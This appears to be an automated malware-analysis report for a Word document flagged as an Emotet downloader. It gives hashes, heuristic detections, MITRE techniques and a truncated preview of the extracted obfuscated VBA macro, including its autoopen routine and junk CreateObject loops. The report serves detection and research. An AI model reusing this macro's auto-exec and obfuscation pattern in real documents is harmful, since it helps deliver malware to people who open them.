Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 f2c356a5be1efb7e…

MALICIOUS

Office (OLE)

137.8 KB Created: 2019-05-15 07:34:00 Authoring application: Microsoft Office Word First seen: 2019-09-30
MD5: 95fb962f90e1d37438a9ddc6e0e9a534 SHA-1: f1ef286c589576d2bc92912d20a1216a0071e251 SHA-256: f2c356a5be1efb7ecd91c0cdf1d9526c539c7477f448eec89342ff38dac8d918
382 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains critical heuristic firings indicating an obfuscated auto-exec VBA loader that uses GetObject and CreateObject to launch a WMI process. This is characteristic of Emotet's downloader functionality, which typically fetches and executes a second-stage payload. The ClamAV signature also confirms this identification.

Heuristics 10

  • ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10281 bytes
SHA-256: 743a7e7dfda2a2565e8fdd26c867834f9c33c3ccf41cdf93f56e900b90fe151f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "j052640"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "n2581304, 0, 0, MSForms, TextBox"
Attribute VB_Control = "b_0376, 1, 1, MSForms, TextBox"
Attribute VB_Control = "f616817, 2, 2, MSForms, TextBox"
Attribute VB_Control = "A64818, 3, 3, MSForms, TextBox"
Attribute VB_Control = "c_0237_4, 4, 4, MSForms, TextBox"
Attribute VB_Control = "C_4934_0, 5, 5, MSForms, TextBox"

Attribute VB_Name = "u6446562"

Attribute VB_Name = "k6471_8"

Attribute VB_Name = "Y5513012"

Attribute VB_Name = "Q12543"

Attribute VB_Name = "k67426_"

Attribute VB_Name = "b001947"

Attribute VB_Name = "r3273_"
Function c1690793(h292409)
   While C53_587 And D081842
            CreateObject ("M950421")
            CreateObject ("z5578801")
            CreateObject ("231383114")
            CreateObject ("213146393")
            CreateObject ("f107038")
Wend
   While P0_58471 And Q52906
            CreateObject ("j25_87")
            CreateObject ("I861_8")
            CreateObject ("483619105")
            CreateObject ("688624756")
            CreateObject ("P0737212")
Wend
   While j43773 And z818476_
            CreateObject ("w7_369_0")
            CreateObject ("z56819")
            CreateObject ("706577816")
            CreateObject ("343803285")
            CreateObject ("P__5__95")
Wend
Set c1690793 = CVar(h292409)
   While X2_54143 And v82302_
            CreateObject ("b9020_5")
            CreateObject ("v137156")
            CreateObject ("560909251")
            CreateObject ("777227899")
            CreateObject ("o2667707")
Wend
   While F83_70 And J07534
            CreateObject ("M247284")
            CreateObject ("C168_02_")
            CreateObject ("5610351")
            CreateObject ("963416791")
            CreateObject ("I22682")
Wend
   While q675499 And i083960
            CreateObject ("D92722")
            CreateObject ("U085700")
            CreateObject ("510324829")
            CreateObject ("550402930")
            CreateObject ("i89530")
Wend
End Function
Sub _
 _
 _
autoopen()
On Error Resume Next
   While f41960 And w03508
            CreateObject ("I2731497")
            CreateObject ("K9_908_")
            CreateObject ("428548477")
            CreateObject ("355109480")
            CreateObject ("q6083913")
Wend
   While S409_350 And p37303
            CreateObject ("v88_801")
            CreateObject ("J00123")
            CreateObject ("857831959")
            CreateObject ("592303265")
            CreateObject ("J47206")
Wend
f36620
   While q89012 And r5958_
            CreateObject ("D_692484")
            CreateObject ("k06017")
            CreateObject ("677609100")
            CreateObject ("931606268")
            CreateObject ("i27826")
Wend
   While z7611852 And t1014709
            CreateObject ("E13633")
            CreateObject ("M7_78_1")
            CreateObject ("800206652")
            CreateObject ("235991737")
            CreateObject ("u_33526")
Wend
   While S6627_2 And H002448
            CreateObject ("l01278")
            CreateObject ("Z3367643")
            CreateObject ("150489629")
            CreateObject ("789683960")
            CreateObject ("Y3__8196")
Wend
End Sub


Attribute VB_Name = "T10276"
Function f36620()
On Error Resume Next
   While A944561 And Z52565
            CreateObject ("Y7427961")
            CreateObject ("i5_617")
            CreateObject ("510837001")
            CreateObject ("217796745")
            CreateObject ("U026_4_5")
Wend
   While z8647351 And n21719
            CreateObject ("w4765347")
            CreateObject ("u2_19009")
            CreateObject ("333769331")
            CreateObject ("749270997")
            CreateObject ("r46_2_")
Wend
   While L02617 And j05392
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.